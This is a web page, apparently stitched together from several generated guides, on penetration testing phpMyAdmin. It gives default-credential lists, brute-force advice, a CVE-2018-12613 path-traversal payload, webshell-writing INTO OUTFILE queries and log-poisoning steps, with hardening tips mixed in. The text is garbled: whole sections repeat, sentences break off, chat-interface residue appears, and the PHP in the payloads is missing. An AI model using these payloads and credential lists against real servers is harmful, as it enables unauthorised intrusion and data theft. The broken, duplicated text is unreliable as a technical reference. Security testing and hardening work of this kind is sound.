Web & Cloud Services in Ireland | +353 87 613 1779

Phpmyadmin | Hacktricks 'link'

To effectively conduct a penetration test or security audit on phpMyAdmin (PMA), it is essential to understand the transition from initial access to Remote Code Execution (RCE). phpMyAdmin is a web-based interface for managing MySQL and MariaDB, making it a high-value target. 🔍 Initial Discovery and Enumeration

Before attempting an exploit, you must identify the version and configuration. Version Detection: Check the /README or /ChangeLog files. Default Credentials: Try root:root, root:, or admin:admin.

Setup Page: Check if /setup/index.php is accessible (allows server re-configuration).

Config Files: Look for config.inc.php backups or leaked credentials in .bash_history. 🔓 Authentication Bypass & Credential Access

If you cannot log in directly, look for misconfigurations that leak access.

Empty Password: Many local environments leave the root password blank.

Config File Leakage: If the server has a Local File Inclusion (LFI), target /etc/phpmyadmin/config.inc.php.

Brute Force: Use tools like Hydra or Burp Suite against the index.php login form. 🚀 Exploitation: From Access to RCE

Once authenticated (or via specific vulnerabilities), the goal is typically to execute commands on the underlying server. 1. SQL Injection to Shell (OUTFILE)

If the MySQL user has the FILE privilege, you can write a web shell directly to the web root. Query:

SELECT "" INTO OUTFILE '/var/www/html/shell.php'; Use code with caution. Copied to clipboard

Requirement: You must know the absolute path of the web directory. 2. Local File Inclusion (LFI)

Older versions of phpMyAdmin are famous for LFI vulnerabilities.

CVE-2018-12613: Allows an authenticated user to include local files via the target parameter.

Payload: /index.php?target=db_sql.php%253f/../../../../../../etc/passwd 3. Session File Inclusion (Log Poisoning)

If LFI is possible but you cannot find a shell, poison the PHP session file. Execute a query: SELECT ""; Find your phpMyAdmin session ID (from cookies).

Include the session file: /var/lib/php/sessions/sess_[YOUR_SID]. 🛠️ Post-Exploitation & Data Exfiltration

After gaining access to the database, move toward full system compromise.

User Table Dumping: Look for wp_users (WordPress) or users tables to crack hashes.

Privilege Escalation: Check if the database user can execute sys_eval() or other UDF (User Defined Functions) to run OS commands.

Sensitive Information: Search for "password", "key", or "config" in all tables. 🛡️ Mitigation & Hardening

To secure a phpMyAdmin installation, follow these industry standards:

IP Whitelisting: Restrict access to specific IP addresses via .htaccess or Nginx config.

Two-Factor Authentication (2FA): Enable PMA's built-in 2FA support.

Disable Root Login: Force the use of non-privileged database users for daily tasks. phpmyadmin hacktricks

Update Regularly: Ensure you are on the latest stable branch to patch known LFI/CSRF flaws.

For those looking to assess the security of phpMyAdmin installations, HackTricks

provides a comprehensive guide focused on reconnaissance and exploitation techniques. The methodology generally follows a path from basic identification to gaining Remote Code Execution (RCE). 1. Initial Reconnaissance & Login

Version Identification: Locate the version by checking the /README or /ChangeLog files, or look for the PMA_VERSION string in the page source.

Default Credentials: Always test common defaults like root:root, root:admin, or root with no password. Some systems may also have anonymous login enabled.

Weak Credentials: If defaults fail, attempt a dictionary attack. Note that many environments may lack rate limiting, though some may require a rate-limit bypass using headers like X-Forwarded-For. 2. Post-Authentication Exploitation

Once logged in, the primary goal is often to pivot from database access to server-level access. Writing a Web Shell (SELECT ... INTO OUTFILE):

If the database user has FILE privileges and you know the absolute web path (e.g., /var/www/html), you can write a PHP shell directly to the disk.

Prerequisite check: Run SHOW VARIABLES LIKE '%secure_file_priv%'; to see if file exports are restricted. Local File Inclusion (LFI) to RCE:

Vulnerability Example: Specific versions like 4.8.0 and 4.8.1 are vulnerable to a path traversal flaw (CVE-2018-12613).

Technique: Execute a SQL query containing PHP code (e.g., SELECT '';). Then, include the session file (located at /var/lib/php/sessions/sess_[YOUR_SESSION_ID]) via the vulnerable target parameter to trigger the code. 3. Advanced Persistence and Attacks

Configuration Files: Check for config.inc.php which may contain hardcoded credentials for other services or the root database user.

PHP Wrappers: Use PHP wrappers (like php://filter) in conjunction with file inclusion vulnerabilities to read the source code of sensitive configuration files. Summary of Common Vulnerabilities Vulnerability Type Description Default Creds Using common login pairs like root:root. CVE-2018-12613 LFI vulnerability in versions 4.8.0-4.8.1 used for RCE. INTO OUTFILE

Writing malicious scripts to the web root if permissions allow. Setup Scripts

Older versions may have a /setup directory left accessible which can be used to reconfigure the server.

This guide outlines penetration testing techniques and security best practices for phpMyAdmin, drawing on common methodologies documented by researchers and platforms like HackTricks. I. Vulnerability Identification & Reconnaissance

The first step involves identifying the specific version of phpMyAdmin and discovering the server's file paths.

Version Detection: Attackers often check for sensitive files to determine the version, such as README, changelog.php, or Documentation.html.

Path Discovery: Knowing the absolute web path is critical for many exploits. Common methods include: Checking phpinfo() pages if accessible.

Fuzzing for web error messages that reveal directory structures.

Querying the database for the data directory using show variables like '%datadir%';. II. Common Exploitation Techniques

Once an instance is identified, several techniques can be used to gain deeper access.

Default Credentials: Many instances remain vulnerable to common default logins (e.g., root with no password).

Remote Code Execution (RCE) via LFI: Specific versions (like 4.8.0 and 4.8.1) have known Local File Inclusion (LFI) vulnerabilities, such as CVE-2018-12613, which can be leveraged for RCE by authenticated users. To effectively conduct a penetration test or security

Writing Webshells (Into Outfile): If the secure_file_priv variable is empty and the user has sufficient privileges, attackers can write a PHP webshell directly to the webroot.

Example: SELECT "" INTO OUTFILE "/var/www/html/shell.php";.

Log File Manipulation: If direct file writing is restricted, attackers may enable the General Query Log, set the log file path to a .php file in the webroot, and execute a query containing PHP code to "poison" the log. III. Security Hardening Best Practices

To mitigate these risks, administrators should implement layered security controls. Restrict Access:

IP Whitelisting: Use web server configurations (Apache/Nginx) to only allow trusted IP addresses.

VPN/SSH Tunneling: The most secure method is to make phpMyAdmin accessible only via a VPN or SSH tunnel. Authentication & Credential Security:

Extra Login Layer: Implement .htaccess or HTTP Basic Authentication to add a prompt before the phpMyAdmin login page.

Two-Factor Authentication (2FA): Enable 2FA for all user accounts.

Disable Root Login: Create specific user accounts with limited privileges instead of using the root account for daily tasks. Environment Hardening:

Change Default URL: Rename the /phpmyadmin directory to a random, non-obvious string to deter automated bots.

Keep Updated: Regularly patch to the latest version to protect against known CVEs.

Configure PHP Settings: Set secure_file_priv in my.cnf to a specific, restricted directory to prevent unauthorized file writes. Linux Hacking Case Studies Part 3: phpMyAdmin

Penetration Testing phpMyAdmin: Exploitation Techniques and HackTricks

phpMyAdmin is one of the most widely used web-based tools for administering MySQL and MariaDB databases. Its ubiquity makes it a high-value target for security researchers and attackers alike. This guide synthesizes methodologies from HackTricks and other industry sources to outline the full lifecycle of a phpMyAdmin penetration test, from initial reconnaissance to achieving Remote Code Execution (RCE). Phase 1: Reconnaissance and Fingerprinting

The first step in any engagement is identifying the instance and its version, as vulnerabilities are highly version-dependent.

Standard Path Discovery: Common default directories include /phpmyadmin/, /pma/, and /setup/. Version Identification:

Login Page: Check the HTML source for comments like or meta tags.

ChangeLog: Accessing /ChangeLog or /Documentation.html can often reveal the exact version if not properly restricted.

HTTP Headers: Look for X-Powered-By: PHP or Set-Cookie: phpMyAdmin=... which confirms the application type. Phase 2: Authentication Testing

Gaining access to the administrative interface is often the bridge to complete database compromise. Default Credentials

Many instances are deployed with weak or default credentials. Common combinations to test include: Username: root / Password: (empty). Username: root / Password: root, password, or mysql. Username: admin / Password: admin. Exploiting Configuration Flaws

Empty Password Bypass: In some setups, such as XAMPP, the root user may have no password set by default.

Exposed Setup Script: Older versions sometimes left /scripts/setup.php or /setup/index.php accessible without authentication, potentially allowing configuration manipulation.

Config File Exposure: If config.inc.php or its backups (like config.inc.php.bak) are accessible, they may contain plaintext credentials for the database. Phase 3: Post-Authentication Exploitation If secure_file_priv is empty → They can read/write

Once authenticated, an attacker can move beyond data theft toward full server compromise. Achieving Shell Access (Getshell)

There are several methods to transition from database access to a web shell:

SELECT INTO OUTFILE: If the MySQL user has the FILE privilege and the absolute web root path is known, you can write a shell directly:

SELECT "" INTO OUTFILE "/var/www/html/shell.php"; ```. Use code with caution.

General Log Manipulation: By enabling the general log and changing its path to a .php file in the web root, an attacker can execute code by simply running a SQL query containing PHP tags. Local File Inclusion (LFI) to RCE

A critical vulnerability, CVE-2018-12613, affected phpMyAdmin versions 4.8.0 and 4.8.1. It allowed authenticated users to include arbitrary files on the server.

Mechanism: The target parameter in index.php was vulnerable to a double-encoding bypass (e.g., using %253f to represent a ?).

Exploitation Path: An attacker could include their own session file (which contains the user's data) after executing a query like SELECT '';. This results in the session file containing executable PHP code. phpMyAdmin

In 2025 and early 2026, security reports for phpMyAdmin have transitioned from simple misconfigurations to complex edge-case vulnerabilities, such as those involving library interactions and specific feature abuse. While classic "HackTricks" methods like SELECT ... INTO OUTFILE

remain relevant for older systems, modern research focuses on Authenticated XSS Library-Level RCE Current Critical Vulnerabilities (2025-2026)

Recent advisories highlight that even patched systems can be vulnerable due to underlying server libraries: CVE-2024-2961 (glibc/iconv RCE): A critical vulnerability in the glibc/iconv library can potentially lead to Remote Code Execution Condition: Requires the

extension to be loaded and a specific vulnerable character set used during export. Mitigation: Upgrade to phpMyAdmin 5.2.2 CVE-2025-24530 (XSS in "Check tables"): Authenticated users can trigger an XSS attack by using a specially-crafted table or database name CVE-2025-24529 (XSS in "Insert"):

An authenticated user can execute malicious scripts through the "Insert" tab functionality. CVE-2022-0813 (Information Disclosure):

Validated as a significant risk in early 2026, this flaw allows attackers to leak sensitive configuration data through malformed parameters. SentinelOne Advanced Exploitation Techniques (HackTricks Style) Penetration testers and researchers from platforms like HackTricks categorize phpMyAdmin attacks into three main tiers: Authenticated RCE via Local File Inclusion (LFI) CVE-2018-12613:

Still the most common lab example for version 4.8.0/4.8.1. Attackers use the

parameter to include session files where they have previously injected PHP code. Webshell via SQL Misconfiguration Into Outfile: If the MySQL user has

privileges and the webroot path is known, an attacker can write a shell directly to the server:

SELECT '' INTO OUTFILE '/var/www/html/shell.php' Client-Side Attacks Arbitrary File Read:

HackTricks notes that if an attacker can force a phpMyAdmin client to connect to a malicious MySQL server, they can read local files from the user's machine. CVE-2025-24530: phpMyAdmin XSS Vulnerability - SentinelOne

11. Conclusion

phpMyAdmin is a powerful tool but can become an easy attack vector when exposed, misconfigured, or unpatched. Combining network restrictions, least-privilege database design, strong authentication, diligent patching, and continuous monitoring significantly reduces risk. Administrators should treat phpMyAdmin as a high-risk administration interface and apply defense-in-depth controls accordingly.

Part 1: Reconnaissance and Fingerprinting

Before launching an attack, you need to identify if phpMyAdmin is present.

Step 3: Post-Authentication Exploitation

Once inside, the attacker checks SELECT @@version, SELECT @@secure_file_priv, and SHOW VARIABLES LIKE 'basedir'.

  • If secure_file_priv is empty → They can read/write anywhere MySQL has permissions.
  • If secure_file_priv is set to a directory → They are restricted to that folder (often /tmp or a MySQL data dir).
  • If secure_file_priv = NULL → File operations are disabled (best case for defender).

Version Detection

  • Default login page often reveals version in source code.
  • /phpmyadmin/README, /phpmyadmin/Documentation.html, /phpmyadmin/ChangeLog
  • /?=phpinfo() if enabled.

2.1 Default Credentials

  • root: (no password) – common in XAMPP/WAMP.
  • root:root
  • root:toor
  • pma:pmapass (special control user)
  • mysql:mysql

Part 2: Authentication Bypasses

The most common entry point is weak or default credentials.

CVE-2016-5734 (Unauthenticated RCE)

In versions < 4.6.2, a crafted .sql upload combined with preg_replace's /e modifier leads to code execution. Requires $cfg['AllowArbitraryServer']=true.

To effectively conduct a penetration test or security audit on phpMyAdmin (PMA), it is essential to understand the transition from initial access to Remote Code Execution (RCE). phpMyAdmin is a web-based interface for managing MySQL and MariaDB, making it a high-value target. 🔍 Initial Discovery and Enumeration

Before attempting an exploit, you must identify the version and configuration. Version Detection: Check the /README or /ChangeLog files. Default Credentials: Try root:root, root:, or admin:admin.

Setup Page: Check if /setup/index.php is accessible (allows server re-configuration).

Config Files: Look for config.inc.php backups or leaked credentials in .bash_history. 🔓 Authentication Bypass & Credential Access

If you cannot log in directly, look for misconfigurations that leak access.

Empty Password: Many local environments leave the root password blank.

Config File Leakage: If the server has a Local File Inclusion (LFI), target /etc/phpmyadmin/config.inc.php.

Brute Force: Use tools like Hydra or Burp Suite against the index.php login form. 🚀 Exploitation: From Access to RCE

Once authenticated (or via specific vulnerabilities), the goal is typically to execute commands on the underlying server. 1. SQL Injection to Shell (OUTFILE)

If the MySQL user has the FILE privilege, you can write a web shell directly to the web root. Query:

SELECT "" INTO OUTFILE '/var/www/html/shell.php'; Use code with caution. Copied to clipboard

Requirement: You must know the absolute path of the web directory. 2. Local File Inclusion (LFI)

Older versions of phpMyAdmin are famous for LFI vulnerabilities.

CVE-2018-12613: Allows an authenticated user to include local files via the target parameter.

Payload: /index.php?target=db_sql.php%253f/../../../../../../etc/passwd 3. Session File Inclusion (Log Poisoning)

If LFI is possible but you cannot find a shell, poison the PHP session file. Execute a query: SELECT ""; Find your phpMyAdmin session ID (from cookies).

Include the session file: /var/lib/php/sessions/sess_[YOUR_SID]. 🛠️ Post-Exploitation & Data Exfiltration

After gaining access to the database, move toward full system compromise.

User Table Dumping: Look for wp_users (WordPress) or users tables to crack hashes.

Privilege Escalation: Check if the database user can execute sys_eval() or other UDF (User Defined Functions) to run OS commands.

Sensitive Information: Search for "password", "key", or "config" in all tables. 🛡️ Mitigation & Hardening

To secure a phpMyAdmin installation, follow these industry standards:

IP Whitelisting: Restrict access to specific IP addresses via .htaccess or Nginx config.

Two-Factor Authentication (2FA): Enable PMA's built-in 2FA support.

Disable Root Login: Force the use of non-privileged database users for daily tasks.

Update Regularly: Ensure you are on the latest stable branch to patch known LFI/CSRF flaws.

For those looking to assess the security of phpMyAdmin installations, HackTricks

provides a comprehensive guide focused on reconnaissance and exploitation techniques. The methodology generally follows a path from basic identification to gaining Remote Code Execution (RCE). 1. Initial Reconnaissance & Login

Version Identification: Locate the version by checking the /README or /ChangeLog files, or look for the PMA_VERSION string in the page source.

Default Credentials: Always test common defaults like root:root, root:admin, or root with no password. Some systems may also have anonymous login enabled.

Weak Credentials: If defaults fail, attempt a dictionary attack. Note that many environments may lack rate limiting, though some may require a rate-limit bypass using headers like X-Forwarded-For. 2. Post-Authentication Exploitation

Once logged in, the primary goal is often to pivot from database access to server-level access. Writing a Web Shell (SELECT ... INTO OUTFILE):

If the database user has FILE privileges and you know the absolute web path (e.g., /var/www/html), you can write a PHP shell directly to the disk.

Prerequisite check: Run SHOW VARIABLES LIKE '%secure_file_priv%'; to see if file exports are restricted. Local File Inclusion (LFI) to RCE:

Vulnerability Example: Specific versions like 4.8.0 and 4.8.1 are vulnerable to a path traversal flaw (CVE-2018-12613).

Technique: Execute a SQL query containing PHP code (e.g., SELECT '';). Then, include the session file (located at /var/lib/php/sessions/sess_[YOUR_SESSION_ID]) via the vulnerable target parameter to trigger the code. 3. Advanced Persistence and Attacks

Configuration Files: Check for config.inc.php which may contain hardcoded credentials for other services or the root database user.

PHP Wrappers: Use PHP wrappers (like php://filter) in conjunction with file inclusion vulnerabilities to read the source code of sensitive configuration files. Summary of Common Vulnerabilities Vulnerability Type Description Default Creds Using common login pairs like root:root. CVE-2018-12613 LFI vulnerability in versions 4.8.0-4.8.1 used for RCE. INTO OUTFILE

Writing malicious scripts to the web root if permissions allow. Setup Scripts

Older versions may have a /setup directory left accessible which can be used to reconfigure the server.

This guide outlines penetration testing techniques and security best practices for phpMyAdmin, drawing on common methodologies documented by researchers and platforms like HackTricks. I. Vulnerability Identification & Reconnaissance

The first step involves identifying the specific version of phpMyAdmin and discovering the server's file paths.

Version Detection: Attackers often check for sensitive files to determine the version, such as README, changelog.php, or Documentation.html.

Path Discovery: Knowing the absolute web path is critical for many exploits. Common methods include: Checking phpinfo() pages if accessible.

Fuzzing for web error messages that reveal directory structures.

Querying the database for the data directory using show variables like '%datadir%';. II. Common Exploitation Techniques

Once an instance is identified, several techniques can be used to gain deeper access.

Default Credentials: Many instances remain vulnerable to common default logins (e.g., root with no password).

Remote Code Execution (RCE) via LFI: Specific versions (like 4.8.0 and 4.8.1) have known Local File Inclusion (LFI) vulnerabilities, such as CVE-2018-12613, which can be leveraged for RCE by authenticated users.

Writing Webshells (Into Outfile): If the secure_file_priv variable is empty and the user has sufficient privileges, attackers can write a PHP webshell directly to the webroot.

Example: SELECT "" INTO OUTFILE "/var/www/html/shell.php";.

Log File Manipulation: If direct file writing is restricted, attackers may enable the General Query Log, set the log file path to a .php file in the webroot, and execute a query containing PHP code to "poison" the log. III. Security Hardening Best Practices

To mitigate these risks, administrators should implement layered security controls. Restrict Access:

IP Whitelisting: Use web server configurations (Apache/Nginx) to only allow trusted IP addresses.

VPN/SSH Tunneling: The most secure method is to make phpMyAdmin accessible only via a VPN or SSH tunnel. Authentication & Credential Security:

Extra Login Layer: Implement .htaccess or HTTP Basic Authentication to add a prompt before the phpMyAdmin login page.

Two-Factor Authentication (2FA): Enable 2FA for all user accounts.

Disable Root Login: Create specific user accounts with limited privileges instead of using the root account for daily tasks. Environment Hardening:

Change Default URL: Rename the /phpmyadmin directory to a random, non-obvious string to deter automated bots.

Keep Updated: Regularly patch to the latest version to protect against known CVEs.

Configure PHP Settings: Set secure_file_priv in my.cnf to a specific, restricted directory to prevent unauthorized file writes. Linux Hacking Case Studies Part 3: phpMyAdmin

Penetration Testing phpMyAdmin: Exploitation Techniques and HackTricks

phpMyAdmin is one of the most widely used web-based tools for administering MySQL and MariaDB databases. Its ubiquity makes it a high-value target for security researchers and attackers alike. This guide synthesizes methodologies from HackTricks and other industry sources to outline the full lifecycle of a phpMyAdmin penetration test, from initial reconnaissance to achieving Remote Code Execution (RCE). Phase 1: Reconnaissance and Fingerprinting

The first step in any engagement is identifying the instance and its version, as vulnerabilities are highly version-dependent.

Standard Path Discovery: Common default directories include /phpmyadmin/, /pma/, and /setup/. Version Identification:

Login Page: Check the HTML source for comments like or meta tags.

ChangeLog: Accessing /ChangeLog or /Documentation.html can often reveal the exact version if not properly restricted.

HTTP Headers: Look for X-Powered-By: PHP or Set-Cookie: phpMyAdmin=... which confirms the application type. Phase 2: Authentication Testing

Gaining access to the administrative interface is often the bridge to complete database compromise. Default Credentials

Many instances are deployed with weak or default credentials. Common combinations to test include: Username: root / Password: (empty). Username: root / Password: root, password, or mysql. Username: admin / Password: admin. Exploiting Configuration Flaws

Empty Password Bypass: In some setups, such as XAMPP, the root user may have no password set by default.

Exposed Setup Script: Older versions sometimes left /scripts/setup.php or /setup/index.php accessible without authentication, potentially allowing configuration manipulation.

Config File Exposure: If config.inc.php or its backups (like config.inc.php.bak) are accessible, they may contain plaintext credentials for the database. Phase 3: Post-Authentication Exploitation

Once authenticated, an attacker can move beyond data theft toward full server compromise. Achieving Shell Access (Getshell)

There are several methods to transition from database access to a web shell:

SELECT INTO OUTFILE: If the MySQL user has the FILE privilege and the absolute web root path is known, you can write a shell directly:

SELECT "" INTO OUTFILE "/var/www/html/shell.php"; ```. Use code with caution.

General Log Manipulation: By enabling the general log and changing its path to a .php file in the web root, an attacker can execute code by simply running a SQL query containing PHP tags. Local File Inclusion (LFI) to RCE

A critical vulnerability, CVE-2018-12613, affected phpMyAdmin versions 4.8.0 and 4.8.1. It allowed authenticated users to include arbitrary files on the server.

Mechanism: The target parameter in index.php was vulnerable to a double-encoding bypass (e.g., using %253f to represent a ?).

Exploitation Path: An attacker could include their own session file (which contains the user's data) after executing a query like SELECT '';. This results in the session file containing executable PHP code. phpMyAdmin

In 2025 and early 2026, security reports for phpMyAdmin have transitioned from simple misconfigurations to complex edge-case vulnerabilities, such as those involving library interactions and specific feature abuse. While classic "HackTricks" methods like SELECT ... INTO OUTFILE

remain relevant for older systems, modern research focuses on Authenticated XSS Library-Level RCE Current Critical Vulnerabilities (2025-2026)

Recent advisories highlight that even patched systems can be vulnerable due to underlying server libraries: CVE-2024-2961 (glibc/iconv RCE): A critical vulnerability in the glibc/iconv library can potentially lead to Remote Code Execution Condition: Requires the

extension to be loaded and a specific vulnerable character set used during export. Mitigation: Upgrade to phpMyAdmin 5.2.2 CVE-2025-24530 (XSS in "Check tables"): Authenticated users can trigger an XSS attack by using a specially-crafted table or database name CVE-2025-24529 (XSS in "Insert"):

An authenticated user can execute malicious scripts through the "Insert" tab functionality. CVE-2022-0813 (Information Disclosure):

Validated as a significant risk in early 2026, this flaw allows attackers to leak sensitive configuration data through malformed parameters. SentinelOne Advanced Exploitation Techniques (HackTricks Style) Penetration testers and researchers from platforms like HackTricks categorize phpMyAdmin attacks into three main tiers: Authenticated RCE via Local File Inclusion (LFI) CVE-2018-12613:

Still the most common lab example for version 4.8.0/4.8.1. Attackers use the

parameter to include session files where they have previously injected PHP code. Webshell via SQL Misconfiguration Into Outfile: If the MySQL user has

privileges and the webroot path is known, an attacker can write a shell directly to the server:

SELECT '' INTO OUTFILE '/var/www/html/shell.php' Client-Side Attacks Arbitrary File Read:

HackTricks notes that if an attacker can force a phpMyAdmin client to connect to a malicious MySQL server, they can read local files from the user's machine. CVE-2025-24530: phpMyAdmin XSS Vulnerability - SentinelOne

11. Conclusion

phpMyAdmin is a powerful tool but can become an easy attack vector when exposed, misconfigured, or unpatched. Combining network restrictions, least-privilege database design, strong authentication, diligent patching, and continuous monitoring significantly reduces risk. Administrators should treat phpMyAdmin as a high-risk administration interface and apply defense-in-depth controls accordingly.

Part 1: Reconnaissance and Fingerprinting

Before launching an attack, you need to identify if phpMyAdmin is present.

Step 3: Post-Authentication Exploitation

Once inside, the attacker checks SELECT @@version, SELECT @@secure_file_priv, and SHOW VARIABLES LIKE 'basedir'.

  • If secure_file_priv is empty → They can read/write anywhere MySQL has permissions.
  • If secure_file_priv is set to a directory → They are restricted to that folder (often /tmp or a MySQL data dir).
  • If secure_file_priv = NULL → File operations are disabled (best case for defender).

Version Detection

  • Default login page often reveals version in source code.
  • /phpmyadmin/README, /phpmyadmin/Documentation.html, /phpmyadmin/ChangeLog
  • /?=phpinfo() if enabled.

2.1 Default Credentials

  • root: (no password) – common in XAMPP/WAMP.
  • root:root
  • root:toor
  • pma:pmapass (special control user)
  • mysql:mysql

Part 2: Authentication Bypasses

The most common entry point is weak or default credentials.

CVE-2016-5734 (Unauthenticated RCE)

In versions < 4.6.2, a crafted .sql upload combined with preg_replace's /e modifier leads to code execution. Requires $cfg['AllowArbitraryServer']=true.